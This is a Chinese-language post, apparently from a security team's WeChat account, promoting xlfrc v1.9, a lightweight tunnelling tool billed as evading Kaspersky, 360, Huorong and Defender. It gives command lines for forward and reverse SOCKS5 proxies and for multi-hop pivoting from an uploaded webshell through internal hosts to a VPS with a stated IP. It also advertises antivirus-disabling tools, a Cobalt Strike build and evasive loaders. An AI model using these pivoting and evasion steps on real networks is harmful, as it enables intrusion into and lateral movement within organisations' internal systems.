C语言构建 | 替代frp 过卡巴斯基、360、火绒、defender的xlfrc v1.9发布！

现在只对常读和星标的公众号才展示大图推送，建议大家能把星落安全团队“设为星标”，否则可能就看不到了啦！

XLFRC经过 8 个版本的迭代，从基于 FRP 的二次开发（改用命令行参数替代配置文件、分离客户端与服务端代码）演进到 1.9 版本彻底重构为基于 EW (anhilo师傅)代码，通过 C 语言重写实现跨平台支持（Windows/Linux）、多层反向代理（2-3 层）和正向代理功能，最终将体积压缩至 1MB（Windows）/50KB（Linux），较 FRP 的 8MB 显著缩减，同时提升了文件传输稳定性。获取方式：连同一键火绒、 一键禁用defender、cobaltstrike4.9.1 linux专版、免杀加载器以及其他发布的工具都放在了内部星球里。

• 基于FRP框架二次开发
• 突破性改进：
• 采用命令行参数替代config.ini配置
• 实现客户端/服务端代码分离
• 随机socks密码、端口等信息

• 转向基于EW代码二次开发
• 关键技术改进：
• C语言重构，体积大幅缩减：
• 实现多层反向代理(2-3层)
• 新增正向代理支持
• 完全分离Windows/Linux代码
• 支持全平台部署
• Windows版：1MB，Linux版：50KB。相较FRP 8MB体积，提升文件上传效率。

技术指标对比：

该重构使XLFRC在轻量化、灵活性和功能性方面均显著超越原FRP框架，特别适合资源受限环境和复杂网络拓扑场景。

使用方法

1. 正向 SOCKS 5代理。适用于目标具备公网IP地址，且端口对外开放。

xlfrc64.exe -s ssocksd -l 1080

2. 反向 SOCKS 5代理。适用于目标不具备公网IP地址，需要我们在VPS上运行xlfrc服务模式。

VPS服务端命令

xlfrc64.exe -s rcsocks -l 1080 -e 8888 

内网机器客户端命令

xlfrc64.exe -s rssocks -d 1.1.1.1 -e 8888

3.二级网络环境

主机A：无公网IP，可以访问外网，可以访问部分内网web资源

主机B：只能全部内网资源，不出网

目前已经通过文件上传漏洞，上传webshell，成功解析，但是无法直接通过哥斯拉连接。这个时候需要我们把B的流量代理出来。

1. 在vps上启动socks端口转发模式。即在公网代理机器中添加转接隧道，将1080端口收到的代理请求转发给8080端口

xlfrc64.exe -s lcx_listen -l 1080 -e 8080

2.然后在主机B上启动socks服务模式，侦听9090端口

xlfrc64.exe -s ssocksd -l 9090

3.然后在主机A执行端口转发模式，即将主机A的8080端口和B主机的9090端口绑定。

xlfrc64.exe -s lcx_slave -d VPS的ip地址 -e 8080 -f 主机B -g 9090

4.三级网络环境

VPS: 117.72.8.10

主机A：无公网IP，可以连通外网 是web服务器(192.168.3.10)

主机B：只能访问内网资源，无法连通外网，只能被A访问(10.10.3.10) 

主机C：可以被B访问并能访问核心业务 只能被B访问(100.10.3.10)

1. 在VPS公网执行，将1080端口收到的代理请求转发到8080端口：

xlfrc64.exe -s rcsocks -l 1080 -e 8080

2. 在主机A上将VPS的8080端口与主机B的9090端口连接起来：

xlfrc64.exe -s lcx_slave -d 117.72.8.10 -e 8080 -f 10.10.3.10 -g 9090

3. 在B主机上将9090端口收到的代理请求转发到7070端口：

xlfrc64.exe -s lcx_listen -l 9090 -e 7070

4. 在主机C上启动SOCKS5服务并反弹到7070端口

xlfrc64.exe -s rssocks -d 10.10.3.10 -e 7070

360安全卫士

火绒

defender